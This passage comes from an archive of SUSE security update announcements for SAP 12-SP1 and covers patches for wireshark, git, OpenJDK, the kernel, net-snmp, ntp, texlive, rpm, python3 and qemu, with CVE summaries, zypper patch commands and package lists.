qemu-x86-2.3.1-33.20.1 - SUSE Linux Enterprise Server for SAP 12-SP1 (noarch): qemu-ipxe-1.0.0-33.20.1 qemu-seabios-1.8.1-33.20.1 qemu-sgabios-8-33.20.1 qemu-vgabios-1.8.1-33.20.1 References: https://www.suse.com/security/cve/CVE-2018-16872.html https://www.suse.com/security/cve/CVE-2018-19364.html https://www.suse.com/security/cve/CVE-2018-19489.html https://www.suse.com/security/cve/CVE-2019-6778.html https://bugzilla.suse.com/1116717 https://bugzilla.suse.com/1117275 https://bugzilla.suse.com/1119493 https://bugzilla.suse.com/1123156 From sle-security-updates at lists.suse.com Sat Apr 27 16:16:06 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Sun, 28 Apr 2019 00:16:06 +0200 (CEST) Subject: SUSE-SU-2018:3590-3: important: Security update for wireshark Message-ID: <20190427221606.D2333F3D3@maintenance.suse.de> SUSE Security Update: Security update for wireshark ______________________________________________________________________________ Announcement ID: SUSE-SU-2018:3590-3 Rating: important References: #1111647 Cross-References: CVE-2018-12086 CVE-2018-18227 Affected Products: SUSE Linux Enterprise Server for SAP 12-SP1 ______________________________________________________________________________ An update that fixes two vulnerabilities is now available. Description: This update for wireshark fixes the following issues: Wireshark was updated to 2.4.10 (bsc#1111647). Following security issues were fixed: - CVE-2018-18227: MS-WSP dissector crash (wnpa-sec-2018-47) - CVE-2018-12086: OpcUA dissector crash (wnpa-sec-2018-50) Further bug fixes and updated protocol support that were done are listed in: https://www.wireshark.org/docs/relnotes/wireshark-2.4.10.html Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Server for SAP 12-SP1: zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-1067=1 Package List: - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64): libwireshark9-2.4.10-48.32.1 libwireshark9-debuginfo-2.4.10-48.32.1 libwiretap7-2.4.10-48.32.1 libwiretap7-debuginfo-2.4.10-48.32.1 libwscodecs1-2.4.10-48.32.1 libwscodecs1-debuginfo-2.4.10-48.32.1 libwsutil8-2.4.10-48.32.1 libwsutil8-debuginfo-2.4.10-48.32.1 wireshark-2.4.10-48.32.1 wireshark-debuginfo-2.4.10-48.32.1 wireshark-debugsource-2.4.10-48.32.1 wireshark-gtk-2.4.10-48.32.1 wireshark-gtk-debuginfo-2.4.10-48.32.1 References: https://www.suse.com/security/cve/CVE-2018-12086.html https://www.suse.com/security/cve/CVE-2018-18227.html https://bugzilla.suse.com/1111647 From sle-security-updates at lists.suse.com Sat Apr 27 16:16:44 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Sun, 28 Apr 2019 00:16:44 +0200 (CEST) Subject: SUSE-SU-2018:4088-2: important: Security update for git Message-ID: <20190427221644.D1C0CF3D3@maintenance.suse.de> SUSE Security Update: Security update for git ______________________________________________________________________________ Announcement ID: SUSE-SU-2018:4088-2 Rating: important References: #1110949 Cross-References: CVE-2018-17456 Affected Products: SUSE Linux Enterprise Server for SAP 12-SP1 ______________________________________________________________________________ An update that fixes one vulnerability is now available. Description: This update for git fixes the following issue: - CVE-2018-17456: Git allowed remote code execution during processing of a recursive "git clone" of a superproject if a .gitmodules file has a URL field beginning with a '-' character. (boo#1110949). Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Server for SAP 12-SP1: zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-1073=1 Package List: - SUSE Linux Enterprise Server for SAP 12-SP1 (noarch): git-doc-2.12.3-27.17.2 - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64): git-core-2.12.3-27.17.2 git-core-debuginfo-2.12.3-27.17.2 git-debugsource-2.12.3-27.17.2 References: https://www.suse.com/security/cve/CVE-2018-17456.html https://bugzilla.suse.com/1110949 From sle-security-updates at lists.suse.com Sat Apr 27 16:17:26 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Sun, 28 Apr 2019 00:17:26 +0200 (CEST) Subject: SUSE-SU-2018:3064-3: important: Security update for java-1_8_0-openjdk Message-ID: <20190427221726.E9321F3D3@maintenance.suse.de> SUSE Security Update: Security update for java-1_8_0-openjdk ______________________________________________________________________________ Announcement ID: SUSE-SU-2018:3064-3 Rating: important References: #1101644 #1101645 #1101651 #1101656 #1106812 Cross-References: CVE-2018-2938 CVE-2018-2940 CVE-2018-2952 CVE-2018-2973 CVE-2018-3639 Affected Products: SUSE Linux Enterprise Server for SAP 12-SP1 ______________________________________________________________________________ An update that fixes 5 vulnerabilities is now available. Description: This update for java-1_8_0-openjdk to the jdk8u181 (icedtea 3.9.0) release fixes the following issues: These security issues were fixed: - CVE-2018-2938: Difficult to exploit vulnerability allowed unauthenticated attacker with network access via multiple protocols to compromise Java SE. Successful attacks of this vulnerability can result in takeover of Java SE (bsc#1101644). - CVE-2018-2940: Vulnerability in subcomponent: Libraries. Easily exploitable vulnerability allowed unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Java SE, Java SE Embedded accessible data (bsc#1101645) - CVE-2018-2952: Vulnerability in subcomponent: Concurrency. Difficult to exploit vulnerability allowed unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded, JRockit. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded, JRockit (bsc#1101651) - CVE-2018-2973: Vulnerability in subcomponent: JSSE. Difficult to exploit vulnerability allowed unauthenticated attacker with network access via SSL/TLS to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Java SE, Java SE Embedded accessible data (bsc#1101656) These non-security issues were fixed: - Improve desktop file usage - Better Internet address support - speculative traps break when classes are redefined - sun/security/pkcs11/ec/ReadCertificates.java fails intermittently - Clean up code that saves the previous versions of redefined classes - Prevent SIGSEGV in ReceiverTypeData::clean_weak_klass_links - RedefineClasses() tests fail assert(((Metadata*)obj)->is_valid()) failed: obj is valid - NMT is not enabled if NMT option is specified after class path specifiers - EndEntityChecker should not process custom extensions after PKIX validation - SupportedDSAParamGen.java failed with timeout - Montgomery multiply intrinsic should use correct name - When determining the ciphersuite lists, there is no debug output for disabled suites. - sun/security/mscapi/SignedObjectChain.java fails on Windows - On Windows Swing changes keyboard layout on a window activation - IfNode::range_check_trap_proj() should handler dying subgraph with single if proj - Even better Internet address support - Newlines in JAXB string values of SOAP-requests are escaped to " " - TestFlushableGZIPOutputStream failing with IndexOutOfBoundsException - Unable to use JDWP API in JDK 8 to debug JDK 9 VM - Hotspot crash on Cassandra 3.11.1 startup with libnuma 2.0.3 - Performance drop with Java JDK 1.8.0_162-b32 - Upgrade time-zone data to tzdata2018d - Fix potential crash in BufImg_SetupICM - JDK 8u181 l10n resource file update - Remove debug print statements from RMI fix - (tz) Upgrade time-zone data to tzdata2018e - ObjectInputStream filterCheck method throws NullPointerException - adjust reflective access checks Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Server for SAP 12-SP1: zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-1070=1 Package List: - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64): java-1_8_0-openjdk-1.8.0.181-27.26.2 java-1_8_0-openjdk-debuginfo-1.8.0.181-27.26.2 java-1_8_0-openjdk-debugsource-1.8.0.181-27.26.2 java-1_8_0-openjdk-demo-1.8.0.181-27.26.2 java-1_8_0-openjdk-demo-debuginfo-1.8.0.181-27.26.2 java-1_8_0-openjdk-devel-1.8.0.181-27.26.2 java-1_8_0-openjdk-headless-1.8.0.181-27.26.2 java-1_8_0-openjdk-headless-debuginfo-1.8.0.181-27.26.2 References: https://www.suse.com/security/cve/CVE-2018-2938.html https://www.suse.com/security/cve/CVE-2018-2940.html https://www.suse.com/security/cve/CVE-2018-2952.html https://www.suse.com/security/cve/CVE-2018-2973.html https://www.suse.com/security/cve/CVE-2018-3639.html https://bugzilla.suse.com/1101644 https://bugzilla.suse.com/1101645 https://bugzilla.suse.com/1101651 https://bugzilla.suse.com/1101656 https://bugzilla.suse.com/1106812 From sle-security-updates at lists.suse.com Sat Apr 27 16:18:39 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Sun, 28 Apr 2019 00:18:39 +0200 (CEST) Subject: SUSE-SU-2018:2908-2: important: Security update for the Linux Kernel Message-ID: <20190427221839.2A3E2F3D3@maintenance.suse.de> SUSE Security Update: Security update for the Linux Kernel ______________________________________________________________________________ Announcement ID: SUSE-SU-2018:2908-2 Rating: important References: #1012382 #1024788 #1062604 #1064233 #1065999 #1090534 #1090955 #1091171 #1092903 #1096547 #1097104 #1097108 #1099811 #1099813 #1099844 #1099845 #1099846 #1099849 #1099863 #1099864 #1099922 #1100001 #1102870 #1103445 #1104319 #1104495 #1104818 #1104906 #1105100 #1105322 #1105323 #1105396 #1106095 #1106369 #1106509 #1106511 #1107689 #1108912 Cross-References: CVE-2018-10853 CVE-2018-10876 CVE-2018-10877 CVE-2018-10878 CVE-2018-10879 CVE-2018-10880 CVE-2018-10881 CVE-2018-10882 CVE-2018-10883 CVE-2018-10902 CVE-2018-10940 CVE-2018-12896 CVE-2018-13093 CVE-2018-14617 CVE-2018-14634 CVE-2018-16276 CVE-2018-16658 CVE-2018-6554 CVE-2018-6555 Affected Products: SUSE Linux Enterprise Server for SAP 12-SP1 ______________________________________________________________________________ An update that solves 19 vulnerabilities and has 19 fixes is now available. Description: The SUSE Linux Enterprise 12 SP1 kernel was updated receive various security and bugfixes. The following security bugs were fixed: - CVE-2018-14634: Prevent integer overflow in create_elf_tables that allowed a local attacker to exploit this vulnerability via a SUID-root binary and obtain full root privileges (bsc#1108912) - CVE-2018-14617: Prevent NULL pointer dereference and panic in hfsplus_lookup() when opening a file (that is purportedly a hard link) in an hfs+ filesystem that has malformed catalog data, and is mounted read-only without a metadata directory (bsc#1102870) - CVE-2018-16276: Incorrect bounds checking in the yurex USB driver in yurex_read allowed local attackers to use user access read/writes to crash the kernel or potentially escalate privileges (bsc#1106095) - CVE-2018-12896: Prevent integer overflow in the POSIX timer code that was caused by the way the overrun accounting works. Depending on interval and expiry time values, the overrun can be larger than INT_MAX, but the accounting is int based. This basically made the accounting values, which are visible to user space via timer_getoverrun(2) and siginfo::si_overrun, random. This allowed a local user to cause a denial of service (signed integer overflow) via crafted mmap, futex, timer_create, and timer_settime system calls (bnc#1099922) - CVE-2018-13093: Prevent NULL pointer dereference and panic in lookup_slow() on a NULL inode->i_ops pointer when doing pathwalks on a corrupted xfs image. This occured because of a lack of proper validation that cached inodes are free during allocation (bnc#1100001) - CVE-2018-10940: The cdrom_ioctl_media_changed function allowed local attackers to use a incorrect bounds check in the CDROM driver CDROM_MEDIA_CHANGED ioctl to read out kernel memory (bsc#1092903) - CVE-2018-16658: Prevent information leak in cdrom_ioctl_drive_status that could have been used by local attackers to read kernel memory (bnc#1107689) - CVE-2018-6555: The irda_setsockopt function allowed local users to cause a denial of service (ias_object use-after-free and system crash) or possibly have unspecified other impact via an AF_IRDA socket (bnc#1106511) - CVE-2018-6554: Prevent memory leak in the irda_bind function that allowed local users to cause a denial of service (memory consumption) by repeatedly binding an AF_IRDA socket (bnc#1106509) - CVE-2018-10902: Protect against concurrent access to prevent double realloc (double free) in snd_rawmidi_input_params() and snd_rawmidi_output_status(). A malicious local attacker could have used this for privilege escalation (bnc#1105322) - CVE-2018-10879: A local user could have caused a use-after-free in ext4_xattr_set_entry function and a denial of service or unspecified other impact by renaming a file in a crafted ext4 filesystem image (bsc#1099844) - CVE-2018-10883: A local user could have caused an out-of-bounds write in jbd2_journal_dirty_metadata(), a denial of service, and a system crash by mounting and operating on a crafted ext4 filesystem image (bsc#1099863) - CVE-2018-10880: Prevent stack-out-of-bounds write in the ext4 filesystem code when mounting and writing to a crafted ext4 image in ext4_update_inline_data(). An attacker could have used this to cause a system crash and a denial of service (bsc#1099845) - CVE-2018-10882: A local user could have caused an out-of-bound write, a denial of service, and a system crash by unmounting a crafted ext4 filesystem image (bsc#1099849) - CVE-2018-10881: A local user could have caused an out-of-bound access in ext4_get_group_info function, a denial of service, and a system crash by mounting and operating on a crafted ext4 filesystem image (bsc#1099864) - CVE-2018-10877: Prevent out-of-bound access in the ext4_ext_drop_refs() function when operating on a crafted ext4 filesystem image (bsc#1099846) - CVE-2018-10876: A use-after-free was possible in ext4_ext_remove_space() function when mounting and operating a crafted ext4 image (bsc#1099811) - CVE-2018-10878: A local user could have caused an out-of-bounds write and a denial of service or unspecified other impact by mounting and operating a crafted ext4 filesystem image (bsc#1099813) - CVE-2018-10853: The KVM hypervisor did not check current privilege(CPL) level while emulating unprivileged instructions. An unprivileged guest user/process could have used this flaw to potentially escalate privileges inside guest (bsc#1097104). The following non-security bugs were fixed: - KEYS: prevent creating a different user's keyrings (bnc#1065999). - KVM: MMU: always terminate page walks at level 1 (bsc#1062604). - KVM: MMU: simplify last_pte_bitmap (bsc#1062604). - KVM: VMX: Work around kABI breakage in 'enum vmx_l1d_flush_state' (bsc#1106369). - KVM: VMX: fixes for vmentry_l1d_flush module parameter (bsc#1106369). - KVM: nVMX: update last_nonleaf_level when initializing nested EPT (bsc#1062604). - Refresh patches.xen/xen3-x86-l1tf-04-protect-PROT_NONE-ptes.patch (bsc#1105100). - Do not report CPU affected by L1TF when ARCH_CAP_RDCL_NO bit is set (bsc#1104906). - Revert "- Disable patches.arch/x86-mm-Simplify-p-g4um-d_page-macros.patch" (bnc#1104818) - bcache: avoid unncessary cache prefetch bch_btree_node_get(). - bcache: calculate the number of incremental GC nodes according to the total of btree nodes. - bcache: display rate debug parameters to 0 when writeback is not running. - bcache: do not check return value of debugfs_create_dir(). - bcache: finish incremental GC. - bcache: fix I/O significant decline while backend devices registering. - bcache: fix error setting writeback_rate through sysfs interface (bsc#1064233). - bcache: free heap cache_set->flush_btree in bch_journal_free. - bcache: make the pr_err statement used for ENOENT only in sysfs_attatch section. - bcache: release dc->writeback_lock properly in bch_writeback_thread(). - bcache: set max writeback rate when I/O request is idle (bsc#1064233). - bcache: simplify the calculation of the total amount of flash dirty data. - cifs: Fix infinite loop when using hard mount option (bsc#1091171). - ext4: check for allocation block validity with block group locked (bsc#1104495). - ext4: do not update checksum of new initialized bitmaps (bnc#1012382). - ext4: fix check to prevent initializing reserved inodes (bsc#1104319). - ext4: fix false negatives *and* false positives in ext4_check_descriptors() (bsc#1103445). - restore cond_resched() in shrink_dcache_parent(). - usbip: vhci_sysfs: fix potential Spectre v1 (bsc#1096547). - x86, l1tf: Protect PROT_NONE PTEs against speculation fixup (bnc#1104818). - x86/speculation: Use ARCH_CAPABILITIES to skip L1D flush on vmentry (bsc#1106369). - xen, x86, l1tf: Protect PROT_NONE PTEs against speculation fixup (bnc#1104818). - xfs: Remove dead code from inode recover function (bsc#1105396). - xfs: convert XFS_AGFL_SIZE to a helper function (bsc#1090955, bsc#1090534). - xfs: detect agfl count corruption and reset agfl (bsc#1090955, bsc#1090534). - xfs: do not log/recover swapext extent owner changes for deleted inodes (bsc#1090955). - xfs: protect inode ->di_dmstate with a spinlock (bsc#1024788). - xfs: repair malformed inode items during log recovery (bsc#1105396). Special Instructions and Notes: Please reboot the system after installing this update. Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Server for SAP 12-SP1: zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-1065=1 Package List: - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64): kernel-default-3.12.74-60.64.104.1 kernel-default-base-3.12.74-60.64.104.1 kernel-default-base-debuginfo-3.12.74-60.64.104.1 kernel-default-debuginfo-3.12.74-60.64.104.1 kernel-default-debugsource-3.12.74-60.64.104.1 kernel-default-devel-3.12.74-60.64.104.1 kernel-syms-3.12.74-60.64.104.1 kernel-xen-3.12.74-60.64.104.1 kernel-xen-base-3.12.74-60.64.104.1 kernel-xen-base-debuginfo-3.12.74-60.64.104.1 kernel-xen-debuginfo-3.12.74-60.64.104.1 kernel-xen-debugsource-3.12.74-60.64.104.1 kernel-xen-devel-3.12.74-60.64.104.1 kgraft-patch-3_12_74-60_64_104-default-1-2.5.1 kgraft-patch-3_12_74-60_64_104-xen-1-2.5.1 - SUSE Linux Enterprise Server for SAP 12-SP1 (noarch): kernel-devel-3.12.74-60.64.104.1 kernel-macros-3.12.74-60.64.104.1 kernel-source-3.12.74-60.64.104.1 References: https://www.suse.com/security/cve/CVE-2018-10853.html https://www.suse.com/security/cve/CVE-2018-10876.html https://www.suse.com/security/cve/CVE-2018-10877.html https://www.suse.com/security/cve/CVE-2018-10878.html https://www.suse.com/security/cve/CVE-2018-10879.html https://www.suse.com/security/cve/CVE-2018-10880.html https://www.suse.com/security/cve/CVE-2018-10881.html https://www.suse.com/security/cve/CVE-2018-10882.html https://www.suse.com/security/cve/CVE-2018-10883.html https://www.suse.com/security/cve/CVE-2018-10902.html https://www.suse.com/security/cve/CVE-2018-10940.html https://www.suse.com/security/cve/CVE-2018-12896.html https://www.suse.com/security/cve/CVE-2018-13093.html https://www.suse.com/security/cve/CVE-2018-14617.html https://www.suse.com/security/cve/CVE-2018-14634.html https://www.suse.com/security/cve/CVE-2018-16276.html https://www.suse.com/security/cve/CVE-2018-16658.html https://www.suse.com/security/cve/CVE-2018-6554.html https://www.suse.com/security/cve/CVE-2018-6555.html https://bugzilla.suse.com/1012382 https://bugzilla.suse.com/1024788 https://bugzilla.suse.com/1062604 https://bugzilla.suse.com/1064233 https://bugzilla.suse.com/1065999 https://bugzilla.suse.com/1090534 https://bugzilla.suse.com/1090955 https://bugzilla.suse.com/1091171 https://bugzilla.suse.com/1092903 https://bugzilla.suse.com/1096547 https://bugzilla.suse.com/1097104 https://bugzilla.suse.com/1097108 https://bugzilla.suse.com/1099811 https://bugzilla.suse.com/1099813 https://bugzilla.suse.com/1099844 https://bugzilla.suse.com/1099845 https://bugzilla.suse.com/1099846 https://bugzilla.suse.com/1099849 https://bugzilla.suse.com/1099863 https://bugzilla.suse.com/1099864 https://bugzilla.suse.com/1099922 https://bugzilla.suse.com/1100001 https://bugzilla.suse.com/1102870 https://bugzilla.suse.com/1103445 https://bugzilla.suse.com/1104319 https://bugzilla.suse.com/1104495 https://bugzilla.suse.com/1104818 https://bugzilla.suse.com/1104906 https://bugzilla.suse.com/1105100 https://bugzilla.suse.com/1105322 https://bugzilla.suse.com/1105323 https://bugzilla.suse.com/1105396 https://bugzilla.suse.com/1106095 https://bugzilla.suse.com/1106369 https://bugzilla.suse.com/1106509 https://bugzilla.suse.com/1106511 https://bugzilla.suse.com/1107689 https://bugzilla.suse.com/1108912 From sle-security-updates at lists.suse.com Sat Apr 27 16:25:20 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Sun, 28 Apr 2019 00:25:20 +0200 (CEST) Subject: SUSE-SU-2018:3447-2: important: Security update for net-snmp Message-ID: <20190427222520.A51DFF3D3@maintenance.suse.de> SUSE Security Update: Security update for net-snmp ______________________________________________________________________________ Announcement ID: SUSE-SU-2018:3447-2 Rating: important References: #1027353 #1081164 #1102775 #1111122 Cross-References: CVE-2018-18065 Affected Products: SUSE Linux Enterprise Server for SAP 12-SP1 ______________________________________________________________________________ An update that solves one vulnerability and has three fixes is now available. Description: This update for net-snmp fixes the following issues: Security issues fixed: - CVE-2018-18065: _set_key in agent/helpers/table_container.c had a NULL Pointer Exception bug that can be used by an authenticated attacker to remotely cause the instance to crash via a crafted UDP packet, resulting in Denial of Service. (bsc#1111122) Non-security issues fixed: - swintst_rpm: Protect against unspecified Group name (bsc#1102775) - Add tsm and tlstm MIBs and the USM security module. (bsc#1081164) - Fix agentx freezing on timeout (bsc#1027353) Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Server for SAP 12-SP1: zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-1064=1 Package List: - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64): libsnmp30-32bit-5.7.3-6.3.1 libsnmp30-5.7.3-6.3.1 libsnmp30-debuginfo-32bit-5.7.3-6.3.1 libsnmp30-debuginfo-5.7.3-6.3.1 net-snmp-5.7.3-6.3.1 net-snmp-debuginfo-5.7.3-6.3.1 net-snmp-debugsource-5.7.3-6.3.1 perl-SNMP-5.7.3-6.3.1 perl-SNMP-debuginfo-5.7.3-6.3.1 snmp-mibs-5.7.3-6.3.1 References: https://www.suse.com/security/cve/CVE-2018-18065.html https://bugzilla.suse.com/1027353 https://bugzilla.suse.com/1081164 https://bugzilla.suse.com/1102775 https://bugzilla.suse.com/1111122 From sle-security-updates at lists.suse.com Sat Apr 27 16:26:59 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Sun, 28 Apr 2019 00:26:59 +0200 (CEST) Subject: SUSE-SU-2018:3342-2: moderate: Security update for ntp Message-ID: <20190427222659.38DE2F3D3@maintenance.suse.de> SUSE Security Update: Security update for ntp ______________________________________________________________________________ Announcement ID: SUSE-SU-2018:3342-2 Rating: moderate References: #1083424 #1098531 #1111853 Cross-References: CVE-2018-12327 CVE-2018-7170 Affected Products: SUSE Linux Enterprise Server for SAP 12-SP1 ______________________________________________________________________________ An update that solves two vulnerabilities and has one errata is now available. Description: NTP was updated to 4.2.8p12 (bsc#1111853): - CVE-2018-12327: Fixed stack buffer overflow in the openhost() command-line call of NTPQ/NTPDC. (bsc#1098531) - CVE-2018-7170: Add further tweaks to improve the fix for the ephemeral association time spoofing additional protection (bsc#1083424) Please also see https://www.nwtime.org/network-time-foundation-publishes-ntp-4-2-8p12/ for more information. Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Server for SAP 12-SP1: zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-1066=1 Package List: - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64): ntp-4.2.8p12-64.8.2 ntp-debuginfo-4.2.8p12-64.8.2 ntp-debugsource-4.2.8p12-64.8.2 ntp-doc-4.2.8p12-64.8.2 References: https://www.suse.com/security/cve/CVE-2018-12327.html https://www.suse.com/security/cve/CVE-2018-7170.html https://bugzilla.suse.com/1083424 https://bugzilla.suse.com/1098531 https://bugzilla.suse.com/1111853 From sle-security-updates at lists.suse.com Sat Apr 27 16:27:48 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Sun, 28 Apr 2019 00:27:48 +0200 (CEST) Subject: SUSE-SU-2018:3033-3: important: Security update for texlive Message-ID: <20190427222748.C5122F3D3@maintenance.suse.de> SUSE Security Update: Security update for texlive ______________________________________________________________________________ Announcement ID: SUSE-SU-2018:3033-3 Rating: important References: #1109673 Cross-References: CVE-2018-17407 Affected Products: SUSE Linux Enterprise Server for SAP 12-SP1 ______________________________________________________________________________ An update that fixes one vulnerability is now available. Description: This update for texlive fixes the following issue: - CVE-2018-17407: Prevent buffer overflow when handling of Type 1 fonts allowed arbitrary code execution when a malicious font was loaded by one of the vulnerable tools: pdflatex, pdftex, dvips, or luatex (bsc#1109673) Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Server for SAP 12-SP1: zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-458=1 Package List: - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64): libkpathsea6-6.2.0dev-22.3.1 libkpathsea6-debuginfo-6.2.0dev-22.3.1 References: https://www.suse.com/security/cve/CVE-2018-17407.html https://bugzilla.suse.com/1109673 From sle-security-updates at lists.suse.com Sat Apr 27 16:34:09 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Sun, 28 Apr 2019 00:34:09 +0200 (CEST) Subject: SUSE-SU-2018:3884-2: important: Security update for rpm Message-ID: <20190427223409.2AEDEF3D3@maintenance.suse.de> SUSE Security Update: Security update for rpm ______________________________________________________________________________ Announcement ID: SUSE-SU-2018:3884-2 Rating: important References: #943457 Cross-References: CVE-2017-7500 CVE-2017-7501 Affected Products: SUSE Linux Enterprise Server for SAP 12-SP1 ______________________________________________________________________________ An update that fixes two vulnerabilities is now available. Description: This update for rpm fixes the following issues: These security issues were fixed: - CVE-2017-7500: rpm did not properly handle RPM installations when a destination path was a symbolic link to a directory, possibly changing ownership and permissions of an arbitrary directory, and RPM files being placed in an arbitrary destination (bsc#943457). - CVE-2017-7501: rpm used temporary files with predictable names when installing an RPM. An attacker with ability to write in a directory where files will be installed could create symbolic links to an arbitrary location and modify content, and possibly permissions to arbitrary files, which could be used for denial of service or possibly privilege escalation (bsc#943457) This is a reissue of the above security fixes for SUSE Linux Enterprise 12 GA, SP1 and SP2 LTSS, they have already been released for SUSE Linux Enterprise Server 12 SP3. Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Server for SAP 12-SP1: zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-1062=1 Package List: - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64): python3-rpm-4.11.2-16.21.1 python3-rpm-debuginfo-4.11.2-16.21.1 python3-rpm-debugsource-4.11.2-16.21.1 rpm-32bit-4.11.2-16.21.1 rpm-4.11.2-16.21.1 rpm-build-4.11.2-16.21.1 rpm-build-debuginfo-4.11.2-16.21.1 rpm-debuginfo-32bit-4.11.2-16.21.1 rpm-debuginfo-4.11.2-16.21.1 rpm-debugsource-4.11.2-16.21.1 rpm-python-4.11.2-16.21.1 rpm-python-debuginfo-4.11.2-16.21.1 rpm-python-debugsource-4.11.2-16.21.1 References: https://www.suse.com/security/cve/CVE-2017-7500.html https://www.suse.com/security/cve/CVE-2017-7501.html https://bugzilla.suse.com/943457 From sle-security-updates at lists.suse.com Sat Apr 27 16:35:06 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Sun, 28 Apr 2019 00:35:06 +0200 (CEST) Subject: SUSE-SU-2019:0243-2: important: Security update for python3 Message-ID: <20190427223506.3F2DDF3D3@maintenance.suse.de> SUSE Security Update: Security update for python3 ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:0243-2 Rating: important References: #1120644 #1122191 Cross-References: CVE-2018-20406 CVE-2019-5010 Affected Products: SUSE Linux Enterprise Server for SAP 12-SP1 ______________________________________________________________________________ An update that fixes two vulnerabilities is now available. Description: This update for python3 fixes the following issues: Security issue fixed: - CVE-2019-5010: Fixed a denial-of-service vulnerability in the X509 certificate parser (bsc#1122191) - CVE-2018-20406: Fixed a integer overflow via a large LONG_BINPUT (bsc#1120644) Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Server for SAP 12-SP1: zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-243=1 Package List: - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64): libpython3_4m1_0-3.4.6-25.21.1 libpython3_4m1_0-debuginfo-3.4.6-25.21.1 python3-3.4.6-25.21.1 python3-base-3.4.6-25.21.1 python3-base-debuginfo-3.4.6-25.21.1 python3-base-debugsource-3.4.6-25.21.1 python3-debuginfo-3.4.6-25.21.1 python3-debugsource-3.4.6-25.21.1 References: https://www.suse.com/security/cve/CVE-2018-20406.html https://www.suse.com/security/cve/CVE-2019-5010.html https://bugzilla.suse.com/1120644 https://bugzilla.suse.com/1122191 From sle-security-updates at lists.suse.com Sat Apr 27 16:35:46 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Sun, 28 Apr 2019 00:35:46 +0200 (CEST) Subject: SUSE-SU-2018:3973-2: moderate: Security update for qemu Message-ID: <20190427223546.807DCF3D3@maintenance.suse.de> SUSE Security Update: Security update for qemu ______________________________________________________________________________ Announcement ID: SUSE-SU-2018:3973-2 Rating: moderate References: #1106222 #1110910 #1111006 #1111010 #1111013 #1114422 Cross-References: CVE-2018-10839 CVE-2018-15746 CVE-2018-17958 CVE-2018-17962 CVE-2018-17963 CVE-2018-18849 Affected Products: SUSE Linux Enterprise Server for SAP 12-SP1 ______________________________________________________________________________ An update that fixes 6 vulnerabilities is now available. Description: This update for qemu fixes the following issues: Security issues fixed: - CVE-2018-10839: Fixed NE2000 NIC emulation support that is vulnerable to an integer overflow, which could lead to buffer overflow issue. It could occur when receiving packets over the network. A user inside guest could use this flaw to crash the Qemu process resulting in DoS (bsc#1110910). - CVE-2018-15746: Fixed qemu-seccomp.c that might allow local OS guest users to cause a denial of service (guest crash) by leveraging mishandling of the seccomp policy for threads other than the main thread (bsc#1106222). - CVE-2018-17958: Fixed a Buffer Overflow in rtl8139_do_receive in hw/net/rtl8139.c because an incorrect integer data type is used (bsc#1111006). - CVE-2018-17962: Fixed a Buffer Overflow in pcnet_receive in hw/net/pcnet.c because an incorrect integer data type is used (bsc#1111010). - CVE-2018-17963: Fixed qemu_deliver_packet_iov in net/net.c that accepts packet sizes greater than INT_MAX, which allows attackers to cause a denial of service or possibly have unspecified other impact. (bsc#1111013) - CVE-2018-18849: Fixed an out of bounds memory access issue that was found in the LSI53C895A SCSI Host Bus Adapter emulation while writing a message in lsi_do_msgin. It could occur during migration if 